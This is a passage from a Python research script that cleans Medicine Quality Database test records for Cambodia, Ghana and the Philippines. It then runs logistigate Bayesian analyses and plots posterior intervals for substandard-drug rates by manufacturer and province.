'Manufacturer'] = 'Phyto-Riker'
MQD_df_GHA.loc[
(MQD_df_GHA.Manufacturer == 'Ronak Exim PVT. Ltd')
| (MQD_df_GHA.Manufacturer == 'Ronak Exim Pvt Ltd'),
'Manufacturer'] = 'Ronak Exim'
# Philippines
# Province
MQD_df_PHI.loc[(MQD_df_PHI.Province == 'CALABARZON'), 'Province'] = 'Calabarzon'
MQD_df_PHI.loc[(MQD_df_PHI.Province == 'region 1 '), 'Province'] = 'Region 1'
MQD_df_PHI.loc[(MQD_df_PHI.Province == 'region7'), 'Province'] = 'Region 7'
MQD_df_PHI.loc[(MQD_df_PHI.Province == 'region9'), 'Province'] = 'Region 9'
# Manufacturer
MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'AM-Europharma')
| (MQD_df_PHI.Manufacturer == 'Am-Euro Pharma Corporation'),
'Manufacturer'] = 'AM-Europharma'
MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Amherst Laboratories Inc')
| (MQD_df_PHI.Manufacturer == 'Amherst Laboratories Inc.')
| (MQD_df_PHI.Manufacturer == 'Amherst Laboratories, Inc.'),
'Manufacturer'] = 'Amherst'
MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Biotech Research Lab Inc.')
| (MQD_df_PHI.Manufacturer == 'BRLI'),
'Manufacturer'] = 'BRLI'
MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Compact Pharmaceutical Corp')
| (MQD_df_PHI.Manufacturer == 'Compact Pharmaceutical Corp.')
| (MQD_df_PHI.Manufacturer == 'Compact Pharmaceutical Corporation'),
'Manufacturer'] = 'Compact'
MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Diamond Laboratorie, Inc. ')
| (MQD_df_PHI.Manufacturer == 'Diamond Laboratories, Inc.'),
'Manufacturer'] = 'Diamond'
MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Drugmakers Biotech Research Laboratories, Inc.')
| (MQD_df_PHI.Manufacturer == 'Drugmakers Laboratories Inc')
| (MQD_df_PHI.Manufacturer == 'Drugmakers Laboratories Inc.')
| (MQD_df_PHI.Manufacturer == 'Drugmakers Laboratories, Inc.'),
'Manufacturer'] = 'Drugmakers'
MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Flamingo Pharmaceuticals Ltd')
| (MQD_df_PHI.Manufacturer == 'Flamingo Pharmaceuticals Ltd.')
| (MQD_df_PHI.Manufacturer == 'Flamingo Pharmaceuticals, Ltd.'),
'Manufacturer'] = 'Flamingo'
MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Interphil Laboratories')
| (MQD_df_PHI.Manufacturer == 'Interphil Laboratories, Inc.')
| (MQD_df_PHI.Manufacturer == 'Interphil Laboratories,Inc'),
'Manufacturer'] = 'Interphil'
MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'J.M. Tolman Laboratories, Inc.')
| (MQD_df_PHI.Manufacturer == 'J.M. Tolmann Lab. Inc.')
| (MQD_df_PHI.Manufacturer == 'J.M. Tolmann Laboratories, Inc.')
| (MQD_df_PHI.Manufacturer == 'J.M.Tollman Laboratories Inc.')
| (MQD_df_PHI.Manufacturer == 'J.M.Tolmann Laboratories Inc')
| (MQD_df_PHI.Manufacturer == 'J.M.Tolmann Laboratories Inc.')
| (MQD_df_PHI.Manufacturer == 'Tolmann'),
'Manufacturer'] = 'J.M. Tolmann'
MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Lloyd Laboratories Inc')
| (MQD_df_PHI.Manufacturer == 'Lloyd Laboratories Inc.')
| (MQD_df_PHI.Manufacturer == 'Lloyd Laboratories, Inc.'),
'Manufacturer'] = 'Lloyd'
MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Lumar Pharmaceutical Lab')
| (MQD_df_PHI.Manufacturer == 'Lumar Pharmaceutical Lab. ')
| (MQD_df_PHI.Manufacturer == 'Lumar Pharmaceutical Laboratory'),
'Manufacturer'] = 'Lumar'
MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Lupin Limited') | (MQD_df_PHI.Manufacturer == 'Lupin Ltd')
| (MQD_df_PHI.Manufacturer == 'Lupin Ltd.'),
'Manufacturer'] = 'Lupin'
MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Missing') | (MQD_df_PHI.Manufacturer == 'No Information Available')
| (MQD_df_PHI.Manufacturer == 'No information'),
'Manufacturer'] = 'Unknown'
MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Natrapharm') | (MQD_df_PHI.Manufacturer == 'Natrapharm Inc.')
| (MQD_df_PHI.Manufacturer == 'Natrapharm, Inc.'),
'Manufacturer'] = 'Natrapharm'
MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'New Myrex Lab., Inc.') | (MQD_df_PHI.Manufacturer == 'New Myrex Laboratories Inc')
| (MQD_df_PHI.Manufacturer == 'New Myrex Laboratories Inc.')
| (MQD_df_PHI.Manufacturer == 'New Myrex Laboratories, Inc.'),
'Manufacturer'] = 'New Myrex'
MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Novartis (Bangladesh)') | (MQD_df_PHI.Manufacturer == 'Novartis (Bangladesh) Ltd.')
| (MQD_df_PHI.Manufacturer == 'Novartis Bangladesh Ltd')
| (MQD_df_PHI.Manufacturer == 'Novartis Bangladesh Ltd.')
| (MQD_df_PHI.Manufacturer == 'Novartis'),
'Manufacturer'] = 'Novartis'
MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Pascual Lab. Inc.')
| (MQD_df_PHI.Manufacturer == 'Pascual Laboratories, Inc.'),
'Manufacturer'] = 'Pascual'
MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Pharex Health Corp.')
| (MQD_df_PHI.Manufacturer == 'Pharex'),
'Manufacturer'] = 'Pharex'
MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Plethico Pharmaceutical Ltd.')
| (MQD_df_PHI.Manufacturer == 'Plethico Pharmaceuticals, Ltd.'),
'Manufacturer'] = 'Plethico'
MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'San Marino Lab., Corp.')
| (MQD_df_PHI.Manufacturer == 'San Marino Laboratories Corp'),
'Manufacturer'] = 'San Marino'
MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Sandoz South Africa Ltd.')
| (MQD_df_PHI.Manufacturer == 'Sandoz Private Ltd.')
| (MQD_df_PHI.Manufacturer == 'Sandoz Philippines Corp.')
| (MQD_df_PHI.Manufacturer == 'Sandoz GmbH')
| (MQD_df_PHI.Manufacturer == 'Sandoz'),
'Manufacturer'] = 'Sandoz'
MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Scheele Laboratories Phil., Inc.')
| (MQD_df_PHI.Manufacturer == 'Scheele Laboratories Phils, Inc.')
| (MQD_df_PHI.Manufacturer == 'Scheele Laboratories Phis., Inc.')
| (MQD_df_PHI.Manufacturer == 'Scheele Laboratories Phils, Inc.'),
'Manufacturer'] = 'Scheele'
MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'The Generics Pharmacy')
| (MQD_df_PHI.Manufacturer == 'The Generics Pharmacy Inc.')
| (MQD_df_PHI.Manufacturer == 'TGP'),
'Manufacturer'] = 'TGP'
MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Wyeth Pakistan Limited')
| (MQD_df_PHI.Manufacturer == 'Wyeth Pakistan Ltd')
| (MQD_df_PHI.Manufacturer == 'Wyeth Pakistan Ltd.'),
'Manufacturer'] = 'Wyeth'
# Make smaller data frames filtered for facility type and therapeutic indication
# Filter for facility type
MQD_df_CAM_filt = MQD_df_CAM[MQD_df_CAM['Facility Type'].isin(
['Depot of Pharmacy', 'Health Clinic', 'Pharmacy', 'Pharmacy Depot', 'Private Clinic',
'Retail-drug Outlet', 'Retail drug outlet', 'Clinic'])].copy()
MQD_df_GHA_filt = MQD_df_GHA[MQD_df_GHA['Facility Type'].isin(
['Health Clinic', 'Hospital', 'Pharmacy', 'Retail Shop', 'Retail-drug Outlet'])].copy()
MQD_df_PHI_filt = MQD_df_PHI[MQD_df_PHI['Facility Type'].isin(
['Health Center', 'Health Clinic', 'Hospital', 'Hospital Pharmacy', 'Pharmacy',
'Retail-drug Outlet', 'health office'])].copy()
# Now filter by chosen drug types
MQD_df_CAM_antimalarial = MQD_df_CAM_filt[MQD_df_CAM_filt['Therapeutic Indications'].isin(['Antimalarial'])].copy()
MQD_df_GHA_antimalarial = MQD_df_GHA_filt[MQD_df_GHA_filt['Therapeutic Indications'].isin(['Antimalarial',
'Antimalarials'])].copy()
MQD_df_PHI_antituberculosis = MQD_df_PHI_filt[MQD_df_PHI_filt['Therapeutic Indications'].isin(['Anti-tuberculosis',
'Antituberculosis'])].copy()
# For each desired data set, generate lists suitable for use with logistigate
# Overall data
dataTbl_CAM = MQD_df_CAM[['Province', 'Manufacturer', 'Final Test Result']].values.tolist()
dataTbl_CAM = [[i[0],i[1],1] if i[2]=='Fail' else [i[0],i[1],0] for i in dataTbl_CAM]
dataTbl_GHA = MQD_df_GHA[['Province', 'Manufacturer', 'Final Test Result']].values.tolist()
dataTbl_GHA = [[i[0], i[1], 1] if i[2] == 'Fail' else [i[0], i[1], 0] for i in dataTbl_GHA]
dataTbl_PHI = MQD_df_PHI[['Province', 'Manufacturer', 'Final Test Result']].values.tolist()
dataTbl_PHI = [[i[0], i[1], 1] if i[2] == 'Fail' else [i[0], i[1], 0] for i in dataTbl_PHI]
# Filtered data
dataTbl_CAM_filt = MQD_df_CAM_filt[['Province', 'Manufacturer', 'Final Test Result']].values.tolist()
dataTbl_CAM_filt = [[i[0], i[1], 1] if i[2] == 'Fail' else [i[0], i[1], 0] for i in dataTbl_CAM_filt]
dataTbl_GHA_filt = MQD_df_GHA_filt[['Province', 'Manufacturer', 'Final Test Result']].values.tolist()
dataTbl_GHA_filt = [[i[0], i[1], 1] if i[2] == 'Fail' else [i[0], i[1], 0] for i in dataTbl_GHA_filt]
dataTbl_PHI_filt = MQD_df_PHI_filt[['Province', 'Manufacturer', 'Final Test Result']].values.tolist()
dataTbl_PHI_filt = [[i[0], i[1], 1] if i[2] == 'Fail' else [i[0], i[1], 0] for i in dataTbl_PHI_filt]
# Therapeutics data
dataTbl_CAM_antimalarial = MQD_df_CAM_antimalarial[['Province', 'Manufacturer', 'Final Test Result']].values.tolist()
dataTbl_CAM_antimalarial = [[i[0], i[1], 1] if i[2] == 'Fail' else [i[0], i[1], 0] for i in dataTbl_CAM_antimalarial]
dataTbl_GHA_antimalarial = MQD_df_GHA_antimalarial[['Province', 'Manufacturer', 'Final Test Result']].values.tolist()
dataTbl_GHA_antimalarial = [[i[0], i[1], 1] if i[2] == 'Fail' else [i[0], i[1], 0] for i in dataTbl_GHA_antimalarial]
dataTbl_PHI_antituberculosis = MQD_df_PHI_antituberculosis[['Province', 'Manufacturer', 'Final Test Result']].values.tolist()
dataTbl_PHI_antituberculosis = [[i[0], i[1], 1] if i[2] == 'Fail' else [i[0], i[1], 0] for i in dataTbl_PHI_antituberculosis]
# Put the databases and lists into a dictionary
outputDict = {}
outputDict.update({'df_ALL':MQD_df,
'df_CAM':MQD_df_CAM, 'df_GHA':MQD_df_GHA, 'df_PHI':MQD_df_PHI,
'df_CAM_filt':MQD_df_CAM_filt, 'df_GHA_filt':MQD_df_GHA_filt, 'df_PHI_filt':MQD_df_PHI_filt,
'df_CAM_antimalarial':MQD_df_CAM_antimalarial, 'df_GHA_antimalarial':MQD_df_GHA_antimalarial,
'df_PHI_antituberculosis':MQD_df_PHI_antituberculosis,
'dataTbl_CAM':dataTbl_CAM, 'dataTbl_GHA':dataTbl_GHA, 'dataTbl_PHI':dataTbl_PHI,
'dataTbl_CAM_filt':dataTbl_CAM_filt, 'dataTbl_GHA_filt':dataTbl_GHA_filt,
'dataTbl_PHI_filt':dataTbl_PHI_filt, 'dataTbl_CAM_antimalarial':dataTbl_CAM_antimalarial,
'dataTbl_GHA_antimalarial':dataTbl_GHA_antimalarial,
'dataTbl_PHI_antituberculosis':dataTbl_PHI_antituberculosis})
return outputDict
def MQDdataScript():
    '''
    Run logistigate analyses on the MQD data sets.

    Uses the cleaned data tables from cleanMQD() plus several pre-built CSV
    extracts, runs the NUTS-based logistigate sampler on each country's
    (outlet=Province, importer=Manufacturer) test results, and produces
    interval plots and printed estimates for each run.
    '''
    import scipy.special as sps
    import numpy as np
    # NUTS sampler settings shared by every logistigate run below
    MCMCdict = {'MCMCtype': 'NUTS', 'Madapt': 5000, 'delta': 0.4}
    # NOTE(review): 'exmples' looks like a typo for 'examples' -- confirm the
    # on-disk directory name before changing it; the path may be misspelled too.
    sys.path.append(os.path.normpath(os.path.join(SCRIPT_DIR, '../logistigate', 'exmples', 'data')))
    # Grab processed data tables
    dataDict = cleanMQD()
    # Run with Country as outlets
    # NOTE(review): unlike 'MQD_TRIMMED2.csv' below, this path has no '.csv'
    # extension -- verify that is intentional.
    dataTblDict = util.testresultsfiletotable('MQDfiles/MQD_TRIMMED1')
    dataTblDict.update({'diagSens': 1.0,
                        'diagSpec': 1.0,
                        'numPostSamples': 500,
                        'prior': methods.prior_normal(mu=sps.logit(0.038)),
                        'MCMCdict': MCMCdict})
    logistigateDict = lg.runlogistigate(dataTblDict)
    util.plotPostSamples(logistigateDict)
    util.printEstimates(logistigateDict)
# Run with Country-Province as outlets
dataTblDict2 = util.testresultsfiletotable('MQDfiles/MQD_TRIMMED2.csv')
dataTblDict2.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 500,
'prior': methods.prior_normal(mu=sps.logit(0.038)),
'MCMCdict': MCMCdict})
logistigateDict2 = lg.runlogistigate(dataTblDict2)
util.plotPostSamples(logistigateDict2)
util.printEstimates(logistigateDict2)
# Run with Cambodia provinces
dataTblDict_CAM = util.testresultsfiletotable(dataDict['dataTbl_CAM'], csvName=False)
countryMean = np.sum(dataTblDict_CAM['Y']) / np.sum(dataTblDict_CAM['N'])
dataTblDict_CAM.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 1000,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_CAM = lg.runlogistigate(dataTblDict_CAM)
numCamImps_fourth = int(np.floor(logistigateDict_CAM['importerNum'] / 4))
util.plotPostSamples(logistigateDict_CAM, plotType='int90',
importerIndsSubset=np.arange(numCamImps_fourth).tolist(),
subTitleStr=['\nCambodia - 1st Quarter', '\nCambodia'])
util.plotPostSamples(logistigateDict_CAM, plotType='int90',
importerIndsSubset=np.arange(numCamImps_fourth,numCamImps_fourth*2).tolist(),
subTitleStr=['\nCambodia - 2nd Quarter', '\nCambodia'])
util.plotPostSamples(logistigateDict_CAM, plotType='int90',
importerIndsSubset=np.arange(numCamImps_fourth * 2, numCamImps_fourth * 3).tolist(),
subTitleStr=['\nCambodia - 3rd Quarter', '\nCambodia'])
util.plotPostSamples(logistigateDict_CAM, plotType='int90',
importerIndsSubset=np.arange(numCamImps_fourth * 3, numCamImps_fourth * 4).tolist(),
subTitleStr=['\nCambodia - 4th Quarter', '\nCambodia'])
util.printEstimates(logistigateDict_CAM)
# Plot importers subset where median sample is above 0.4
totalEntities = logistigateDict_CAM['importerNum'] + logistigateDict_CAM['outletNum']
sampMedians = [np.median(logistigateDict_CAM['postSamples'][:,i]) for i in range(totalEntities)]
highImporterInds = [i for i, x in enumerate(sampMedians[:logistigateDict_CAM['importerNum']]) if x > 0.4]
util.plotPostSamples(logistigateDict_CAM, importerIndsSubset=highImporterInds,subTitleStr=['\nCambodia - Subset','\nCambodia'])
util.printEstimates(logistigateDict_CAM, importerIndsSubset=highImporterInds)
# Run with Cambodia provinces filtered for outlet-type samples
dataTblDict_CAM_filt = util.testresultsfiletotable(dataDict['dataTbl_CAM_filt'], csvName=False)
#dataTblDict_CAM_filt = util.testresultsfiletotable('MQDfiles/MQD_CAMBODIA_FACILITYFILTER.csv')
countryMean = np.sum(dataTblDict_CAM_filt['Y']) / np.sum(dataTblDict_CAM_filt['N'])
dataTblDict_CAM_filt.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 1000,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_CAM_filt = lg.runlogistigate(dataTblDict_CAM_filt)
numCamImps_fourth = int(np.floor(logistigateDict_CAM_filt['importerNum'] / 4))
util.plotPostSamples(logistigateDict_CAM_filt, plotType='int90',
importerIndsSubset=np.arange(numCamImps_fourth).tolist(),
subTitleStr=['\nCambodia (filtered) - 1st Quarter', '\nCambodia (filtered)'])
util.plotPostSamples(logistigateDict_CAM_filt, plotType='int90',
importerIndsSubset=np.arange(numCamImps_fourth, numCamImps_fourth * 2).tolist(),
subTitleStr=['\nCambodia (filtered) - 2nd Quarter', '\nCambodia (filtered)'])
util.plotPostSamples(logistigateDict_CAM_filt, plotType='int90',
importerIndsSubset=np.arange(numCamImps_fourth * 2, numCamImps_fourth * 3).tolist(),
subTitleStr=['\nCambodia (filtered) - 3rd Quarter', '\nCambodia (filtered)'])
util.plotPostSamples(logistigateDict_CAM_filt, plotType='int90',
importerIndsSubset=np.arange(numCamImps_fourth * 3, logistigateDict_CAM_filt['importerNum']).tolist(),
subTitleStr=['\nCambodia (filtered) - 4th Quarter', '\nCambodia (filtered)'])
# Run with Cambodia provinces filtered for antibiotics
dataTblDict_CAM_antibiotic = util.testresultsfiletotable('MQDfiles/MQD_CAMBODIA_ANTIBIOTIC.csv')
countryMean = np.sum(dataTblDict_CAM_antibiotic['Y']) / np.sum(dataTblDict_CAM_antibiotic['N'])
dataTblDict_CAM_antibiotic.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 1000,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_CAM_antibiotic = lg.runlogistigate(dataTblDict_CAM_antibiotic)
numCamImps_third = int(np.floor(logistigateDict_CAM_antibiotic['importerNum'] / 3))
util.plotPostSamples(logistigateDict_CAM_antibiotic, plotType='int90',
importerIndsSubset=np.arange(numCamImps_third).tolist(),
subTitleStr=['\nCambodia - 1st Third (Antibiotics)', '\nCambodia (Antibiotics)'])
util.plotPostSamples(logistigateDict_CAM_antibiotic, plotType='int90',
importerIndsSubset=np.arange(numCamImps_third, numCamImps_third * 2).tolist(),
subTitleStr=['\nCambodia - 2nd Third (Antibiotics)', '\nCambodia (Antibiotics)'])
util.plotPostSamples(logistigateDict_CAM_antibiotic, plotType='int90',
importerIndsSubset=np.arange(numCamImps_third * 2, logistigateDict_CAM_antibiotic['importerNum']).tolist(),
subTitleStr=['\nCambodia - 3rd Third (Antibiotics)', '\nCambodia (Antibiotics)'])
util.printEstimates(logistigateDict_CAM_antibiotic)
# Run with Cambodia provinces filtered for antimalarials
dataTblDict_CAM_antimalarial = util.testresultsfiletotable(dataDict['dataTbl_CAM_antimalarial'], csvName=False)
countryMean = np.sum(dataTblDict_CAM_antimalarial['Y']) / np.sum(dataTblDict_CAM_antimalarial['N'])
dataTblDict_CAM_antimalarial.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 1000,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_CAM_antimalarial = lg.runlogistigate(dataTblDict_CAM_antimalarial)
#numCamImps_half = int(np.floor(logistigateDict_CAM_antimalarial['importerNum'] / 2))
#util.plotPostSamples(logistigateDict_CAM_antimalarial, plotType='int90',
# importerIndsSubset=np.arange(numCamImps_half).tolist(),
# subTitleStr=['\nCambodia - 1st Half (Antimalarials)', '\nCambodia (Antimalarials)'])
#util.plotPostSamples(logistigateDict_CAM_antimalarial, plotType='int90',
# importerIndsSubset=np.arange(numCamImps_half,
# logistigateDict_CAM_antimalarial['importerNum']).tolist(),
# subTitleStr=['\nCambodia - 2nd Half (Antimalarials)', '\nCambodia (Antimalarials)'])
# Special plotting for these data sets
numImp, numOut = logistigateDict_CAM_antimalarial['importerNum'], logistigateDict_CAM_antimalarial['outletNum']
lowerQuant, upperQuant = 0.05, 0.95
intStr = '90'
priorSamps = logistigateDict_CAM_antimalarial['prior'].expitrand(5000)
priorLower, priorUpper = np.quantile(priorSamps, lowerQuant), np.quantile(priorSamps, upperQuant)
importerIndsSubset = range(numImp)
impNames = [logistigateDict_CAM_antimalarial['importerNames'][i] for i in importerIndsSubset]
impLowers = [np.quantile(logistigateDict_CAM_antimalarial['postSamples'][:, l], lowerQuant) for l in importerIndsSubset]
impUppers = [np.quantile(logistigateDict_CAM_antimalarial['postSamples'][:, l], upperQuant) for l in importerIndsSubset]
midpoints = [impUppers[i] - (impUppers[i] - impLowers[i]) / 2 for i in range(len(impUppers))]
zippedList = zip(midpoints, impUppers, impLowers, impNames)
sorted_pairs = sorted(zippedList, reverse=True)
impNamesSorted = [tup[3] for tup in sorted_pairs]
impNamesSorted.append('')
impNamesSorted.append('(Prior)')
# Plot
import matplotlib.pyplot as plt
fig, (ax) = plt.subplots(figsize=(10, 10), ncols=1)
sorted_pairs.append((np.nan, np.nan, np.nan, ' ')) # for spacing
for _, upper, lower, name in sorted_pairs:
plt.plot((name, name), (lower, upper), 'o-', color='red')
plt.plot((impNamesSorted[-1], impNamesSorted[-1]), (priorLower, priorUpper), 'o--', color='gray')
plt.ylim([0, 1])
plt.xticks(range(len(impNamesSorted)), impNamesSorted, rotation=90)
plt.title('Manufacturers - ' + intStr + '% Intervals' + '\nCambodia Antimalarials',
fontdict={'fontsize': 18, 'fontname': 'Trebuchet MS'})
plt.xlabel('Manufacturer Name', fontdict={'fontsize': 14, 'fontname': 'Trebuchet MS'})
plt.ylabel('Interval value', fontdict={'fontsize': 14, 'fontname': 'Trebuchet MS'})
for label in (ax.get_xticklabels() + ax.get_yticklabels()):
label.set_fontname('Times New Roman')
label.set_fontsize(9)
fig.tight_layout()
plt.show()
plt.close()
outletIndsSubset = range(numOut)
outNames = [logistigateDict_CAM_antimalarial['outletNames'][i] for i in outletIndsSubset]
outLowers = [np.quantile(logistigateDict_CAM_antimalarial['postSamples'][:, numImp + l], lowerQuant) for l in outletIndsSubset]
outUppers = [np.quantile(logistigateDict_CAM_antimalarial['postSamples'][:, numImp + l], upperQuant) for l in outletIndsSubset]
midpoints = [outUppers[i] - (outUppers[i] - outLowers[i]) / 2 for i in range(len(outUppers))]
zippedList = zip(midpoints, outUppers, outLowers, outNames)
sorted_pairs = sorted(zippedList, reverse=True)
outNamesSorted = [tup[3] for tup in sorted_pairs]
outNamesSorted.append('')
outNamesSorted.append('(Prior)')
# Plot
fig, (ax) = plt.subplots(figsize=(8, 10), ncols=1)
sorted_pairs.append((np.nan, np.nan, np.nan, ' ')) # for spacing
for _, upper, lower, name in sorted_pairs:
plt.plot((name, name), (lower, upper), 'o-', color='purple')
plt.plot((outNamesSorted[-1], outNamesSorted[-1]), (priorLower, priorUpper), 'o--', color='gray')
plt.ylim([0, 1])
plt.xticks(range(len(outNamesSorted)), outNamesSorted, rotation=90)
plt.title('Regional Aggregates - ' + intStr + '% Intervals' + '\nCambodia Antimalarials',
fontdict={'fontsize': 18, 'fontname': 'Trebuchet MS'})
plt.xlabel('Regional Aggregate', fontdict={'fontsize': 14, 'fontname': 'Trebuchet MS'})
plt.ylabel('Interval value', fontdict={'fontsize': 14, 'fontname': 'Trebuchet MS'})
for label in (ax.get_xticklabels() + ax.get_yticklabels()):
label.set_fontname('Times New Roman')
label.set_fontsize(11)
fig.tight_layout()
plt.show()
plt.close()
util.Summarize(logistigateDict_CAM_antimalarial)
# Run with Ethiopia provinces
dataTblDict_ETH = util.testresultsfiletotable('MQDfiles/MQD_ETHIOPIA.csv')
countryMean = np.sum(dataTblDict_ETH['Y']) / np.sum(dataTblDict_ETH['N'])
dataTblDict_ETH.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 500,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_ETH = lg.runlogistigate(dataTblDict_ETH)
util.plotPostSamples(logistigateDict_ETH)
util.printEstimates(logistigateDict_ETH)
# Run with Ghana provinces
dataTblDict_GHA = util.testresultsfiletotable(dataDict['dataTbl_GHA'], csvName=False)
#dataTblDict_GHA = util.testresultsfiletotable('MQDfiles/MQD_GHANA.csv')
countryMean = np.sum(dataTblDict_GHA['Y']) / np.sum(dataTblDict_GHA['N'])
dataTblDict_GHA.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 1000,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_GHA = lg.runlogistigate(dataTblDict_GHA)
util.plotPostSamples(logistigateDict_GHA, plotType='int90',
subTitleStr=['\nGhana', '\nGhana'])
util.printEstimates(logistigateDict_GHA)
# Plot importers subset where median sample is above 0.4
totalEntities = logistigateDict_GHA['importerNum'] + logistigateDict_GHA['outletNum']
sampMedians = [np.median(logistigateDict_GHA['postSamples'][:, i]) for i in range(totalEntities)]
highImporterInds = [i for i, x in enumerate(sampMedians[:logistigateDict_GHA['importerNum']]) if x > 0.4]
highOutletInds = [i for i, x in enumerate(sampMedians[logistigateDict_GHA['importerNum']:]) if x > 0.15]
util.plotPostSamples(logistigateDict_GHA, importerIndsSubset=highImporterInds,
outletIndsSubset=highOutletInds,
subTitleStr=['\nGhana - Subset', '\nGhana - Subset'])
util.printEstimates(logistigateDict_GHA, importerIndsSubset=highImporterInds,outletIndsSubset=highOutletInds)
# Run with Ghana provinces filtered for outlet-type samples
dataTblDict_GHA_filt = util.testresultsfiletotable(dataDict['dataTbl_GHA_filt'], csvName=False)
#dataTblDict_GHA_filt = util.testresultsfiletotable('MQDfiles/MQD_GHANA_FACILITYFILTER.csv')
countryMean = np.sum(dataTblDict_GHA_filt['Y']) / np.sum(dataTblDict_GHA_filt['N'])
dataTblDict_GHA_filt.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 1000,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_GHA_filt = lg.runlogistigate(dataTblDict_GHA_filt)
util.plotPostSamples(logistigateDict_GHA_filt, plotType='int90',
subTitleStr=['\nGhana (filtered)', '\nGhana (filtered)'])
util.printEstimates(logistigateDict_GHA_filt)
# Run with Ghana provinces filtered for antimalarials
dataTblDict_GHA_antimalarial = util.testresultsfiletotable(dataDict['dataTbl_GHA_antimalarial'], csvName=False)
#dataTblDict_GHA_antimalarial = util.testresultsfiletotable('MQDfiles/MQD_GHANA_ANTIMALARIAL.csv')
countryMean = np.sum(dataTblDict_GHA_antimalarial['Y']) / np.sum(dataTblDict_GHA_antimalarial['N'])
dataTblDict_GHA_antimalarial.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 1000,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_GHA_antimalarial = lg.runlogistigate(dataTblDict_GHA_antimalarial)
#util.plotPostSamples(logistigateDict_GHA_antimalarial, plotType='int90',
# subTitleStr=['\nGhana (Antimalarials)', '\nGhana (Antimalarials)'])
#util.printEstimates(logistigateDict_GHA_antimalarial)
# Special plotting for these data sets
numImp, numOut = logistigateDict_GHA_antimalarial['importerNum'], logistigateDict_GHA_antimalarial['outletNum']
lowerQuant, upperQuant = 0.05, 0.95
intStr = '90'
priorSamps = logistigateDict_GHA_antimalarial['prior'].expitrand(5000)
priorLower, priorUpper = np.quantile(priorSamps, lowerQuant), np.quantile(priorSamps, upperQuant)
importerIndsSubset = range(numImp)
impNames = [logistigateDict_GHA_antimalarial['importerNames'][i] for i in importerIndsSubset]
impLowers = [np.quantile(logistigateDict_GHA_antimalarial['postSamples'][:, l], lowerQuant) for l in
importerIndsSubset]
impUppers = [np.quantile(logistigateDict_GHA_antimalarial['postSamples'][:, l], upperQuant) for l in
importerIndsSubset]
midpoints = [impUppers[i] - (impUppers[i] - impLowers[i]) / 2 for i in range(len(impUppers))]
zippedList = zip(midpoints, impUppers, impLowers, impNames)
sorted_pairs = sorted(zippedList, reverse=True)
impNamesSorted = [tup[3] for tup in sorted_pairs]
impNamesSorted.append('')
impNamesSorted.append('(Prior)')
# Plot
import matplotlib.pyplot as plt
fig, (ax) = plt.subplots(figsize=(10, 10), ncols=1)
sorted_pairs.append((np.nan, np.nan, np.nan, ' ')) # for spacing
for _, upper, lower, name in sorted_pairs:
plt.plot((name, name), (lower, upper), 'o-', color='red')
plt.plot((impNamesSorted[-1], impNamesSorted[-1]), (priorLower, priorUpper), 'o--', color='gray')
plt.ylim([0, 1])
plt.xticks(range(len(impNamesSorted)), impNamesSorted, rotation=90)
plt.title('Manufacturers - ' + intStr + '% Intervals' + '\nGhana Antimalarials',
fontdict={'fontsize': 18, 'fontname': 'Trebuchet MS'})
plt.xlabel('Manufacturer Name', fontdict={'fontsize': 14, 'fontname': 'Trebuchet MS'})
plt.ylabel('Interval value', fontdict={'fontsize': 14, 'fontname': 'Trebuchet MS'})
for label in (ax.get_xticklabels() + ax.get_yticklabels()):
label.set_fontname('Times New Roman')
label.set_fontsize(9)
fig.tight_layout()
plt.show()
plt.close()
outletIndsSubset = range(numOut)
outNames = [logistigateDict_GHA_antimalarial['outletNames'][i][6:] for i in outletIndsSubset]
outNames[7] = 'Western'
outLowers = [np.quantile(logistigateDict_GHA_antimalarial['postSamples'][:, numImp + l], lowerQuant) for l in
outletIndsSubset]
outUppers = [np.quantile(logistigateDict_GHA_antimalarial['postSamples'][:, numImp + l], upperQuant) for l in
outletIndsSubset]
